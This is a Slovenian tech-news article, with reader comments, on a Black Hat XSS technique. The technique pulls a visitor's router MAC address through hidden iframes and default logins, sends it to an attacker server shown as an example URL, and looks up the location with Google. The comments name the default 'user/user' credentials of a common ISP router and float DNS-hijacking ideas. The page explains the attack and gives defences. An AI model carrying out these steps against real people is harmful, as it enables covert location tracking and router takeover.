» »

Inovativen napad: Geolokacija, tudi brez vaše privolitve

Slo-Tech - Dobro znani varnostni inženir Sammy Kamkar je na konferenci Black Hat predstavil zanimiv cross site scripting (XSS) napad, ki omogoča pridobitev zelo natančne fizične lokacije uporabnika. S spretno uporabo javascripta pridobi MAC naslov brezžičnega usmerjevalnika na strani uporabnika, nato pa preko Googleove geolokacijske storitve opravi poizvedbo za lokacijo tega MAC naslova. Google je v okviru programa Street View zbiral tudi podatke o prisotnih brezičnih omrežjih, s katerimi lahko precej natančno določi geografsko lokacijo brezžičnega usmerjevalnika.

Postopek, imenovan "How I met your girlfriend", in s humorističnim vzdevkom "XXXSS" (za cross-site scripting), je lepo razložen v video posnetku predavanja.
  1. Uporabnik obišče napadalčevo spletišče
  2. Na spletišču je skritih več iframe elementov, ki odpirajo naslove kot npr. http://192.168.1.1/moj_linksys_router ali http://192.168.200.1/imam_dlink - za vsako popularno dostopno točko po eden. Napadalec do teh naslovov ne more neposredno dostopati, ker se nahajajo na notranjem omrežju uporabnika, za uporabnikov brskalnik pa to seveda ni ovira.
  3. Na vsak iframe je dodan javascript onload handler, ki požene javscript kodo v primeru, da se kateri od teh naslovov dejansko naloži. Koda se nato z rabo privzetega gesla poskusi prijaviti v nadzorni vmesnik dostopne točke in potem ven izluščiti MAC naslov usmerjevalnika.
  4. Javascript koda naredi http zahtevek na naslov
    http://streznik.od.napadal.ca/zabelezi_mac.cgi?mac=00:16:3e:18:44:44
    Tako dobi napadalec podatek o MAC naslovu uporabnikovega routerja.
  5. Napadalec kdaj drugič zaprosi za geolokacijo. Namesto pravega MAC naslova pa v zaglavje http zahtevka vstavi prej pridobljen uporabnikov MAC naslov, Google pa mu vrne tudi do 10 metrov natančno lokacijo.

Tovrstno početje je precej zanesljivo zlasti v ZDA, kjer so Googlovi avtomobili že natančno kartografirali ulice. Poleg kamer imajo nameščene še brezžične vmesnike, ki zavzetno in brez počitka beležijo najdena brezžična omrežja in njihovo moč. S premikom avtomobila moč narašča oz. pada, Googlova programska oprema pa lahko iz zbranih podatkov precej natančno določi lokacijo brezžičnega usmerjevalnika. Podatki se potem uporabljajo za geolokacijo zlasti mobilnih naprav in so bistveno bolj zanesljivi od same IP geolokacije. Mobilec je namreč bodisi na mobilnem bodisi na WiFi omrežju, in oba ponujata celice relativno majhne velikosti in s tem seveda zelo natančno geolokacijo. To pa zelo prav pride pri aplikacijah tipa augmented reality, kjer je ravno podatek o natančni lokaciji ključen.

Spomnimo, da je v EU Google prišel na oviro z nedavnim incidentom glede varovanja zasebnosti. Poleg problematičnega snemanja fotografij se je izkazalo, da naj bi Google v določenih primerih zbiral ne samo lokacijske podatke o WiFi usmerjevalnikov, ampak tudi vsebino prenosov po teh omrežjih, v kolikor niso bila šifrirana. Posledično je bilo na Google veliko pritiska s strani Evropske komisije in tudi vlad držav članic, kar je Google prisililo v odstranitev WiFi sprejemnikov (severna Evropa) in ponekod celo v suspenz ali prenehanje programa.

Nekaj nasvetov za obrambo pred tem napadom:

  1. Preprečite, da bi Googlovi avtomobilčki poknjižili vaš usmerjevalnik. Preden gredo mimo (v določenih evropskih državah morajo to vnaprej najaviti v lokalnem časopisju), je potrebno router preklopiti v "stealth mode", tj. način brez najavljanja svoje prisotnosti. Priklopijo se lahko le uporabniki, ki poznajo SSID, in če ta ni ravno linksys, bo vse vredu.
  2. Naslednja točka je preprečitev prijave z uporabo XSS napada. Sem sodi zamenjava privzetega nadzorniškega gesla z svojim, po možnosti dobrim. Alternativa je omejitev dostopa do nadzornega vmesnika zgolj preko žične povezave. Če dostop do vmesnika preko brezžičnega omrežja ni mogoč, ste s prenosnikom v dnevni sobi varni.
  3. Redno posodabljanje brskalnikov z varnostnimi popravki in po možnosti še kak vtičnik, ki blokira dostop do sumljivih spletnih strani (strani z ribarjenjem, XSS in drugimi napadi). Najnovejši Firefox in Chrome že vsebujeta vse potrebno.
  4. Vedno pa velja tudi zdrava presoja pri uporabi interneta.
V prihodnosti bo raba geolokacije zgolj večja, države pa na to gledajo izrazito dvolično. Po eni strani bijejo plat zvonov varovanja zasebnosti, po drugi strani pa si njihove policijske in obveščevalne službe močno želijo dostopa (v realnem času?) do teh podatkov, ali še huje, kar posredovanje teh podatkov določenim organizacijam v zasebnih sferah. Do obojega bo prihajalo, upajmo le, da pravna država ne zataji in da nošenje digitalnih pripomočkov ne postane obvezno oz. da ne-nošenje poleg načela "če nimate ničesar za skrivati, se nimate ničesar bati" ne postane tudi podlaga za sum.

34 komentarjev

Blisk ::

Jaz pa mislim, da google počne to v sodelovanju kake CIA ali FBI. In da so korak pred nami. Vedno več je novih "zakonov", ki omejujejo internet, in kaj se lahko počne preko njega. Seveda takoj, ko se bodo vse države zedinile in bodo vse preprečevale dostope do raznih zadev, se bo verjetno pojavilo underground wi-fi omrežje. Se pravi se bodo ljudje med sabo povezovali prek wi-fijev. Če ima vlada že v naprej seznam kje so te točke, ki jih bodo lahko preverjali ali blokirali, je to prednost za njih.

Malo paranoično in futuristično. :)

techfreak :) ::

Če hoče napadelec pridobiti podatke, morajo spodnji pogoji biti izpolnjeni:
1. Dostopna točka oz. usmerjevalnik mora biti znan napadalcu
2. Napadalec mora poznati firmware, ki je naložen na takšno AP
3. Uporabnik mora imeti vklopljen web strežnik na APju
4. Web strežnik mora poslušati na portu 80
5. IP usmerjevalnika/APja mora biti privzet
6. Uporabnik mora pustiti privzeto uporabniško ime in geslo
7. Dostopna točka mora biti vidna Google avtu

Torej ST uporabniki niso izpostavljeni nevarnosti.

Zgodovina sprememb…

Spock83 ::

Meni je fascinantno kako Andorid in njegove aplikacije izjemno natančno določijo položaj uporabnika z uporabo WiFija in ne GPSa!
http://sketchbook.si

BlueRunner ::

No, pa pojdimo po vrsti...

techfreak :) je izjavil:

1. Dostopna točka oz. usmerjevalnik mora biti znan napadalcu

Če "biti znan" pomeni "poznati model", potem si lahko predstavljaš, da ima 40% uporabnikov interneta v Sloveniji enega izmed iskratelovih usmerjevalnikov, ki jih uporablja Telekom Slovenije...


techfreak :) je izjavil:

2. Napadalec mora poznati firmware, ki je naložen na takšno AP

Koliko različnih verzij tega pa trenutno obstaja? Dve? Morda tri? Razširjena je kvečjemu ena za vsak tip usmerjevalnika (ADSL, VDSL, FTTH).


techfreak :) je izjavil:

3. Uporabnik mora imeti vklopljen web strežnik na APju

Privzeto vključeno, ne da se ga izključiti.


techfreak :) je izjavil:

4. Web strežnik mora poslušati na portu 80

Ditto


techfreak :) je izjavil:

5. IP usmerjevalnika/APja mora biti privzet

Ditto


techfreak :) je izjavil:

6. Uporabnik mora pustiti privzeto uporabniško ime in geslo

user/user


techfreak :) je izjavil:

7. Dostopna točka mora biti vidna Google avtu

Počakajmo, da se pripeljejo mimo. Do takrat pa se morda lahko uporabi tudi katerega iymed seznamov WiFi točk, ki pokrivajo tudi Slovenijo. Wardriving je pač prisoten tudi pri nas.


techfreak :) je izjavil:

Torej ST uporabniki niso izpostavljeni nevarnosti.

Mislim, da jih je verjetno kar nekaj izpostavljenih nevarnosti. Glede na verigo ranljivosti je najlažje in najbolj pravilno, da čim prej spremenijo privzeto up. ime in geslo "user/user", potem pa samo še upajo, da v javnost ne bodo prišla sistemska gesla, tako kot se je v preteklosti že dogajalo.


Še bolje pa je, če se to/takšno napravo uporablja samo kot glup prehod med xDSL/kablom/FTTH in namenskim usmerjevalnikom. Tudi zaradi drugih ranljivosti, ki javnosti v splošnem še niso znane. To pa vključuje tudi ločen VoIP telefon in ne uporabo tistega VoIP vmesnika, ki je vgrajen.

Zgodovina sprememb…

PARTyZAN ::

Spremenjen password v firmwaru in teh težav ni več. Za še večje paranoike pa obstaja NoScript :P
i7 6700K | GTX970 | Z170 PG | 16 GB DDR4-2666
Leadex Gold 650W | Xonar Phoebus | Samsung 830 256GB

maddog ::

Spock83 je izjavil:

Meni je fascinantno kako Andorid in njegove aplikacije izjemno natančno določijo položaj uporabnika z uporabo WiFija in ne GPSa!


Ne samo Android:

http://gmaps-samples-v3.googlecode.com/...

huelz ::

Zanimivo, pa za sprobat tud.
Se kar veliko svercam na (ne)zascitenih wifijih po Ljubljani (prek telefona), predvsem zarad kolicine podatkov (in ja kar nekaj jih ima user/password ala "user/admin" oz "password/geslo").
Bom sprobal zadevo doma, pa v sluzbi, glede na to da je testiranje "v laboratoriju" najmanj problematicno :))
Sploh je pa najmanjsi problem met laptop s sabo, pa te podatke sam pobrat.

raY_ ::

maddog je izjavil:

Spock83 je izjavil:

Meni je fascinantno kako Andorid in njegove aplikacije izjemno natančno določijo položaj uporabnika z uporabo WiFija in ne GPSa!


Ne samo Android:

http://gmaps-samples-v3.googlecode.com/...


Pa me je našel v Ljubljani na Prešernovem trgu ;)
Hvala bogu danes LOL. Sem 200km stran ;)
raY_

forsmark ::

en dobro pečen burek
Airbus Industrie

borisk ::

ja, v novem utorrentu lahko s pomočjo aplikacije uMap vidiš lokacijo uporabnikov s katerimi si povezan

fiction ::

Meni se pa vse skupaj ne zdi prav zelo inovativno. Drive-by-pharming je že kar nekaj časa znan. Tukaj gre samo za to, da načeloma ne rabiš administratorskega dostopa do routerja, saj ne spreminjaš nobenih nastavitev, ampak te zanima samo MAC naslov. Samo kakšna pa je verjetnost, da je uporabnik spremenil geslo za "admin", za "user" pa ne?

Ok, potem uporabiš podatke od Googla o WLAN omrežjih, ki so jih "kartografirali" in je to to. Lahko bi pa (z admin dostopom in spremembo DNS serverjev) prestregal celotno komunikacijo in na podlagi npr. podpisa v nešifrirani elektronski pošti pridobil še veliko bolj natančno lokacijo. Če tam ni celotnega naslova pa recimo na podlagi telefonske številke lahko sklepaš o naslovu.

Da me ne bo kdo narobe razumel, nočem reči da je problem zanemarljiv, samo to, da je vse skupaj naravna razširitev kraje (osebnih) podatkov. Napadalec bo vedno tisto, kar pridobi, poskušal čim bolje "unovčiti". Kot bi npr. nekdo rekel "Zlikovci kradejo avtomobile" in potem čez nekaj časa "Neverjetna novica, zlikovci imajo nov sistem: kradejo avtomobile in jih tudi prodajajo naprej". :)

huelz ::

Gre bolj za to, kako trivialno lahka je zadeva, da prides do tega.
Meni celo uporabna naprimer. Geolokacija je samo ena od stvari, ki jo lahko dobis na tak nacin.

Update:
Kaj pa ce redirectas traffic, na ruterjih se da tud dns-je spoofat? Za MITM napade deloma uporabna zadeva, vsaj tolk da poberes tiste podatke, ki so ti potencialno zanimivi.

Zgodovina sprememb…

  • spremenil: huelz ()

techfreak :) ::

BlueRunner je izjavil:

Če "biti znan" pomeni "poznati model", potem si lahko predstavljaš, da ima 40% uporabnikov interneta v Sloveniji enega izmed iskratelovih usmerjevalnikov, ki jih uporablja Telekom Slovenije...
Dvomim. 40% uporabnikov interneta pri nas uporablja nove Siol usmerjevalnike, ampak dvomim da jih ima 50% sploh vklopljen wireless. Vse ostale trditve temeljijo na teh trditvah.

BlueRunner je izjavil:

Koliko različnih verzij tega pa trenutno obstaja? Dve? Morda tri? Razširjena je kvečjemu ena za vsak tip usmerjevalnika (ADSL, VDSL, FTTH).
Če odmislimo Siolovega, ima večina drugih usmerjevalnikov različne vmesnik in veliko jih podpira Linux - recimo dd-wrt firmware je popularen

BlueRunner je izjavil:

Privzeto vključeno, ne da se ga izključiti.
Spet domnevaš tega od Siola. Na dd-wrt ga lahko izklopiš, open-wrt pa ga sploh nima privzeto vklopljenega.

BlueRunner je izjavil:

techfreak :) je izjavil:

4. Web strežnik mora poslušati na portu 80

Ditto
Na dd-wrt lahko spremeniš port brez dostopa do SSHja.

BlueRunner je izjavil:

techfreak :) je izjavil:

5. IP usmerjevalnika/APja mora biti privzet

Ditto
Tudi privzeti firmware ponavadi dovoli spremembo IPja. Saj to je logično.

BlueRunner je izjavil:

techfreak :) je izjavil:

6. Uporabnik mora pustiti privzeto uporabniško ime in geslo

user/user
98% uporabnikov ne pozna mrežne opreme in raje pokliče kolega, ki mu to uredi - torej je logično, da ta kolega zamenja privzeto geslo

BlueRunner je izjavil:

techfreak :) je izjavil:

Torej ST uporabniki niso izpostavljeni nevarnosti.

Mislim, da jih je verjetno kar nekaj izpostavljenih nevarnosti. Glede na verigo ranljivosti je najlažje in najbolj pravilno, da čim prej spremenijo privzeto up. ime in geslo "user/user", potem pa samo še upajo, da v javnost ne bodo prišla sistemska gesla, tako kot se je v preteklosti že dogajalo.
Sistemska gesla verjetno ne more vsakdo uporabljati kar tako, poleg tega pa izklopiš WLAN in je. Če pa tega ne moreš (nevem kakšne usmerjevalnike imajo) pa odstraniš WLAN anteno in ga oviješ z alu folijo. Poleg tega to je eden izmed razlogov, zakaj bi bilo dobro imeti izvorno kodo odprto - da lahko vsak spremeni kako delujejo njegove naprave.

Zgodovina sprememb…

huelz ::

@techfreak :)
Ne bos verjel, ampak vecina folka je prelena, da bi to spreminjala. Pa za vklopit wireless ni nek kunst, pa spet je lazji ne dat tud osnovno enkripcijo, ker imas samo se en password vec, ki ga scasoma pozabis.
Uglavnem, sprehod se enkrat po kakem vecjem naselju, bos presenecen kolk ljudi NIMA ne zaklenjenga wirelessa, kamoli da bodo spreminjali u/p na ruterju.

Tud ce 99% folka ni funkcinalno pismena (in ne zna prebrat step by step navodil), bo pac klikala next (kjer pa je ponavad ze vse na "default").

Plus, tud ce bi blo dejansko vse odprto, kdo zaboga bo sel pa za vsak krep stelat miljon nastavitev? Vsi hocejo, da zadeva dela out of the box, in ravno z preconfigured, default, najbolj pogostimi nastavitvami omogocis povprecnemu Janezu, da si ne razbija glave in/ali klice support oz. sosedovaga mulca, da pride nastimat internet :))

McMallar ::

Jaz recimo uporabljam še en pristop, ki tu ni omenjen. Poleg tega, da so vsa gesla zamenjana ipd. tudi omejim moč oddajanja usmerjevalnika. Glede na to, da opremo uporabljam le v stanovanju sem s poizkušanjem nastavil moč signala na toliko, da mi prenosnik deluje samo doma.

Predvidevam, da Google avtomobili uporabljajo boljše, vsaj delno usmerjene antene, ampak za zaščito pred folkom, ki ima 5min cajta in bi malo hekal moj router pa pomaga.
Why can't a programmer tell the difference between Halloween and Christmas?
Because OCT31 = DEC25

Azgard ::

Jaz bi dejstvu, da skripta lahko odpira strani, ki so na lokalni mreži rekel bug/vulnerability browserja. In sploh to nima vze z nobeno geolokacijo od googla, ta vulnarability se lahko uporabla še za mnoge druge bolj nevarne napade, ko pa eno bogo geolokacijo, like nadzor nad routerjem, glavno napravo v celem omrežju...

techfreak :) ::

Glede na to, da opremo uporabljam le v stanovanju sem s poizkušanjem nastavil moč signala na toliko, da mi prenosnik deluje samo doma.

Jaz sem ugotovil, da imam moč na 71 mW, kar je privzeto, dd-wrt pa mi ponuja, da nastavim do 250 mW. Me zanima, če je teh 250 res možno s to opremo.

McMallar ::

Jaz pa na 30mW.
Why can't a programmer tell the difference between Halloween and Christmas?
Because OCT31 = DEC25

fiction ::

Jaz bi dejstvu, da skripta lahko odpira strani, ki so na lokalni mreži rekel bug/vulnerability browserja.
Mogoče bodo slidi malo bolj razjasnili stvari. Načeloma s tem, da se v iframe naloada nekaj z lokalne mreže, ni nič narobe. Če ti lahko do tistega dostopaš z brskalnikom, ne vidim zakaj to ne bi smelo delati v iframu. Druga stvar je pa potem, če skripta lahko dostopa do teh podatkov. Tu pride do izraza same origin policy. Skripta z napadalčeve strani (kakor koli že) ne bi smela imeti dostopa do podatkov z routerja (in tako tudi ne more prebrati MAC naslova). Zato je nujen predpogoj, da napad sploh deluje XSS na webinterfacu od routerja. To v novici ni omenjeno.

Kaj pa ce redirectas traffic, na ruterjih se da tud dns-je spoofat? Za MITM napade deloma uporabna zadeva, vsaj tolk da poberes tiste podatke, ki so ti potencialno zanimivi.
Fora je v bistvu v tem, da home router lahko deluje tudi kot DNS forwarder. Lokalno preko DHCP-ja clienti dobijo ta nameserver. Le-ta pa vpraša naprej DNS strežnike, ki so skonfigurirani. Če to spremeniš lahko prestrezaš kar veliko stvari. To je v bistvu neke vrste CSRF.

Se pravi napadi potrebujejo naivnost uporabnika (obišče določeno stran, nima nastavljenega gesla), ampak kljub temu mora pa še vedno tudi spletni vmesnik na domačem usmerjevalniku imeti napako.

techfreak :) ::

Mogoče bodo slidi malo bolj razjasnili stvari. Načeloma s tem, da se v iframe naloada nekaj z lokalne mreže, ni nič narobe. Če ti lahko do tistega dostopaš z brskalnikom, ne vidim zakaj to ne bi smelo delati v iframu. Druga stvar je pa potem, če skripta lahko dostopa do teh podatkov. Tu pride do izraza same origin policy. Skripta z napadalčeve strani (kakor koli že) ne bi smela imeti dostopa do podatkov z routerja (in tako tudi ne more prebrati MAC naslova). Zato je nujen predpogoj, da napad sploh deluje XSS na webinterfacu od routerja. To v novici ni omenjeno.

Problem, ki ga jaz vidim je v tem, da lahko javascript dostopa do iframe-a z vsebino, ki ni iz iste domene.

Pyr0Beast ::

techfreak :) je izjavil:

Glede na to, da opremo uporabljam le v stanovanju sem s poizkušanjem nastavil moč signala na toliko, da mi prenosnik deluje samo doma.

Jaz sem ugotovil, da imam moč na 71 mW, kar je privzeto, dd-wrt pa mi ponuja, da nastavim do 250 mW. Me zanima, če je teh 250 res možno s to opremo.


Nad 125mW je vsako povečevanje moči popolnoma nesmiselno, ker je signal preveč popačen. Tam 71 je ok.

Jaz imam na 21mW pa je output 1.2W :)
Some nanoparticles are more equal than others

Good work: Any notion of sanity and critical thought is off-topic in this place

fiction ::

Tudi to, da se da BSSID od WLAN omrežja uporabiti kot neke vrste Cell-ID z mobilnega omrežja za lokalizacijo uporabnika je old-news. Je pa mogoče res inovativno, da se je Google lotil tega v takem obsegu skupaj s slikanjem za Street View. Čeprav se mi zdi, da je za pridobivanje podatkov "zlorabil" tudi
uporabnike z "Maps for Mobile", ki imajo na telefonu WLAN.

Manjšanje jakosti signala v bistvu omejuje samo tebe pa še nikoli ne moreš biti 100 % prepričan kaj se "sliši ven" Tudi če izklopiš periodične beacone, še zmeraj lahko nekdo posniffa komunikacijo in tako ugotovi MAC naslov usmerjevalnika v bližini.

Mogoče je najbolj enostavno zmesti Google tako, da se spremeni MAC naslov od routerja. Vsa omrežja, ki so dovolj daleč narazen, bi lahko zanalašč uporabiljala isti naslov. In periodično bi se ta lahko naključno spremenil.

Pyr0Beast ::

No, manjšanje oddajne moči routerja pomaga, pravtako pa bi moral zmanjšati oddajno moč odjemalca.
Nato še ACK timing priviti na 20m.
Some nanoparticles are more equal than others

Good work: Any notion of sanity and critical thought is off-topic in this place

fiction ::

techfreak :) je izjavil:

Problem, ki ga jaz vidim je v tem, da lahko javascript dostopa do iframe-a z vsebino, ki ni iz iste domene.
Če bi lahko, bi to res bil problem, ampak na srečo ne more. Zato je treba izkoristiti XSS na usmerjevalniku in zlobno skripto naloadati v kontekstu webinterfaca.

MrStein ::

geolokacija moj domači AP (pa tudi na firmi) določi na 10 m natančno.
Je google hodil po sloveniji ali so dobili te podatke drugače?

router preklopiti v "stealth mode", tj. način brez najavljanja svoje prisotnosti. Priklopijo se lahko le uporabniki, ki poznajo SSID, in če ta ni ravno linksys, bo vse vredu.

A to je oni "Broadcast SSID: No" ?
To se z malo sreče "skreka" v sekundi. Razen tega se Google ne prijavlja na mrežo, ampak samo beleži prisotnost.
Teštiram če delaž - umlaut dela: ä ?

Zgodovina sprememb…

  • spremenil: MrStein ()

techfreak :) ::

fiction je izjavil:

techfreak :) je izjavil:

Problem, ki ga jaz vidim je v tem, da lahko javascript dostopa do iframe-a z vsebino, ki ni iz iste domene.
Če bi lahko, bi to res bil problem, ampak na srečo ne more. Zato je treba izkoristiti XSS na usmerjevalniku in zlobno skripto naloadati v kontekstu webinterfaca.

Očitno spregledal, se mi je pa zdelo čudno, predvsem za to ker sem o iframe-ih in dostopih preko JS do njih že bral, da je to zaščiteno. Na /. sem o tem že bral, vendar takrat nisem prebral izvornega članka, pri tej novici pa tudi ne najdem link to njega.

MrStein je izjavil:

router preklopiti v "stealth mode", tj. način brez najavljanja svoje prisotnosti. Priklopijo se lahko le uporabniki, ki poznajo SSID, in če ta ni ravno linksys, bo vse vredu.

A to je oni "Broadcast SSID: No" ?
To se z malo sreče "skreka" v sekundi. Razen tega se Google ne prijavlja na mrežo, ampak samo beleži prisotnost.

Dvomim, da bi Google iskal tudi skrite SSIDe.

Kaj Android telefoni avtomatsko skenirajo za omrežja in pošiljajo nazaj na Google? Ker tudi MAC mojega WLAN najde na nekaj metrov natančno.

Zgodovina sprememb…

fiction ::

MrStein je izjavil:

geolokacija moj domači AP (pa tudi na firmi) določi na 10 m natančno. Je google hodil po sloveniji ali so dobili te podatke drugače?
Pomoje so jih dobili drugače - in sicer s pomočjo Maps for Mobile. Vem da so tam imeli problem, ker zbiranje podatkov sprva ni bilo navedeno v ToS. Lahko pa da tudi Android to dela.

Če je kdo v bližini poganjal zadevo na telefonu in je njegov telefon imel Wi-Fi, je bilo to dovolj. Lokacijo so dobili ali iz telefonovega GPS-a ali pa iz Cell-ID-ja od mobilnega omrežja.

MrStein je izjavil:

router preklopiti v "stealth mode", tj. način brez najavljanja svoje prisotnosti. Priklopijo se lahko le uporabniki, ki poznajo SSID, in če ta ni ravno linksys, bo vse vredu.

A to je oni "Broadcast SSID: No" ? To se z malo sreče "skreka" v sekundi. Razen tega se Google ne prijavlja na mrežo, ampak samo beleži prisotnost.

Ja. Broadcast SSID pomeni, ali naj AP periodično pošilja beacon paket z imenom omrežja in vsemi podatki ali ne. Tudi če je to izklopljeno, ti še vedno lahko slišiš, kako se nekdo pogovarja. In iz tega izveš vse potrebno. Ni mišljeno, da bi zaradi izklopa tega bil bolj varen - ime omrežja navsezadnje ni geslo za avtentikacijo. Edini cilj je pač, da je takrat, ko ni prometa res vse tiho.

Googlu ni bilo treba eksplicitno iskati skritih SSID-jev. Oni so samo pobrali vse pakete, ki so jih slišali. Če so lahko iz zajetih beacnov ali pa iz podatkovnih paketov sklepali o AP-ju jim je čisto vseeno.

[...] vendar takrat nisem prebral izvornega članka, pri tej novici pa tudi ne najdem link to njega.
Problem je, da v tej novici ni linka na izvorni članek pa tudi povzetek delovanja je površen. Mogoče ti bodo tiste prosojnice od avtorja, ki sem jih linkal malo prej pomagale. NAT-pinning je zanimiva ideja.

Azgard ::

techfreak :) je izjavil:


Kaj Android telefoni avtomatsko skenirajo za omrežja in pošiljajo nazaj na Google? Ker tudi MAC mojega WLAN najde na nekaj metrov natančno.


Če maš Android me čudi da tega ne veš, namreč če ga uporabljaš si moral klikniti tudi accept pod to zbiranje podatkov, med samo nastavitvijo, ko se telefon prvič prižge. Seveda če kljukico odstraniš potem hkrati tudi assisted GPS izklopiš, Google zna:) Ampak večina vas itak Next klika na zadeva, grda razvada...

Zgodovina sprememb…

  • spremenil: Azgard ()

Matthai ::

BlueRunner je izjavil:

techfreak :) je izjavil:

Torej ST uporabniki niso izpostavljeni nevarnosti.

Mislim, da jih je verjetno kar nekaj izpostavljenih nevarnosti.

Niti ne. Kot namreč beremo v novici gre za postopek, imenovan "How I met your girlfriend" (XXXSS). Slo-Tech geeki pač nimajo "prijateljic". :D

No, resno: vprašanje koliko tovrstnega skeniranja ne bodo izvajali tudi Androidi (če ga že ne).
Zloraba oblasti, avtokracija in tema nikoli ne pridejo hipoma, vedno je vmesno
obdobje mračenja, ko se dan preveša v noč; biti moramo pozorni opazovalci
okolja in varuhi luči, da ne postanemo nemočni ujetniki teme. --W. Douglas

Spock83 ::

Malo pozabljajo, da novi routeri že vsebujejo CAPTCHA, kar jim malo bolj oteži delo.
http://sketchbook.si

BlueRunner ::

techfreak :) je izjavil:

BlueRunner je izjavil:

Če "biti znan" pomeni "poznati model", potem si lahko predstavljaš, da ima 40% uporabnikov interneta v Sloveniji enega izmed iskratelovih usmerjevalnikov, ki jih uporablja Telekom Slovenije...


Dvomim. 40% uporabnikov interneta pri nas uporablja nove Siol usmerjevalnike, ampak dvomim da jih ima 50% sploh vklopljen wireless.

Vse ostale trditve temeljijo na teh trditvah.

Da, res je, da ostale predpostavke sedijo na tem izhodišču. Vendar je cca. 60.000 naprav na trgu, ki je velik cca. 300.000 priključkov kar dobro izhodišče za usmerjen napad. Pa tudi tistih 50% aktivinh WiFi-jev se mi zdi čez palec kakšnih 15-20% premajhna številka, glede na to kako so pri nas razširjeni prenosniki.

Zato menim, da sočnosti te populacije nikakor ne gre podcenjevati in iskratelovega usmerjevalnika ne gledati samo kot roben primer. Dejansko je to pri nas lahko glavna tarča, tako kot so konkretni usmerjevalniki glavne tarče pri tujih velikih ponudnikih, ki dajejo uporabnikom lastno opremo.

Ostali tvoji argumenti, kjer se zanašaš na večjo raznovrstnost in izpostavljaš npr DD-WRT, tako padejo v vodo.

techfreak :) je izjavil:

BlueRunner je izjavil:

techfreak :) je izjavil:

6. Uporabnik mora pustiti privzeto uporabniško ime in geslo

user/user

98% uporabnikov ne pozna mrežne opreme in raje pokliče kolega, ki mu to uredi - torej je logično, da ta kolega zamenja privzeto geslo

Tvoj procent je nerealen in nepotrjen. Morda med mlajšimi to res velja. Veliko več pa jih pokliče 080-1000 ali pa sami nekaj poklikajo. Sprememba privzetega IP naslova za LAN ali pa sprememba gesla se preprosto ne zgodi. Lahko bi šel empirično preveriti kakšen procent uporabnikov je takšen, vendar pa bi to bilo že kaznivo dejanje. Na lastno referenco pa se ne morem sklicevati ... ;((


techfreak :) je izjavil:

BlueRunner je izjavil:

techfreak :) je izjavil:

Torej ST uporabniki niso izpostavljeni nevarnosti.

Mislim, da jih je verjetno kar nekaj izpostavljenih nevarnosti. Glede na verigo ranljivosti je najlažje in najbolj pravilno, da čim prej spremenijo privzeto up. ime in geslo "user/user", potem pa samo še upajo, da v javnost ne bodo prišla sistemska gesla, tako kot se je v preteklosti že dogajalo.

Sistemska gesla verjetno ne more vsakdo uporabljati kar tako, poleg tega pa izklopiš WLAN in je. Če pa tega ne moreš (nevem kakšne usmerjevalnike imajo) pa odstraniš WLAN anteno in ga oviješ z alu folijo.

Tukaj se zanašaš na to, da se skupna skrivnost, ki jo mora vedeti več kot en človek in, ki omogoča dostop do vseh naprav istega tipa (še vedno trdim, da so iskratelove naprave v Sloveniji prime target). Hude stvari privzemaš, ki si jih jaz niti pod razno ne bi.

Če pa izključiš WLAN pa je to itak game over za geolokacijo. Nihče izven tvojih prostorov in fizičnega dostopa pač več ne bo mogel najti MAC naslova usmerjevalnik in ga povezati z določeno lokacijo. Tukaj je govora bolj o temu, kaj se ti lahko zgodi, če WiFi imaš v kombinaciji s tem, kar je drugim javno dosegljivo.

techfreak :) je izjavil:

Poleg tega to je eden izmed razlogov, zakaj bi bilo dobro imeti izvorno kodo odprto - da lahko vsak spremeni kako delujejo njegove naprave.

Lepo bi bilo, če bi bilo.

McMallar ::

Poleg tega to je eden izmed razlogov, zakaj bi bilo dobro imeti izvorno kodo odprto - da lahko vsak spremeni kako delujejo njegove naprave.


V tem primeru je to malo kontradiktorno: najprej je velikemu stevilu uporabnikov tezko zamenjati IP naslov, spremeniti geslo,... oz. tega sploh ne zna/ve. Po drugi strani pa bi si zeleli odprto kodo za usmerjevalnike...

Tisti, ki uporabljamo dd-wrt itak lahko vedno preverimo/prevedemo sw za svojo opremo. Oz. vsaj za usmerjevalnik.
Why can't a programmer tell the difference between Halloween and Christmas?
Because OCT31 = DEC25

hruske ::

Mimogrede, ali je Google že hodil po naših krajih ali pa mobilni Google maps te informacije pošilja Googleu - meni namreč tale wifi Geolokacija dela *tako zelo* natančno, da ima Google zagotovo informacijo o lokaciji tega access pointa.
Errarum humane est.

MrStein ::

Da ima infote, je zgleda dejstvo.
Zdaj je še vprašanje, kako jih je dobil.
Zgoraj je že nekaj teorij napisanih.
Teštiram če delaž - umlaut dela: ä ?


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Inovativen napad: Geolokacija, tudi brez vaše privolitve

Oddelek: Novice / Varnost
345898 (4004) MrStein
»

UPC in Canyon brežična točka

Oddelek: Omrežja in internet
7624 (403) Spc
»

(Ne)nevarni XSS napadi

Oddelek: Novice / Varnost
243567 (2085) nubes
»

MAC - IP

Oddelek: Omrežja in internet
292468 (2183) korenje_ver2

Več podobnih tem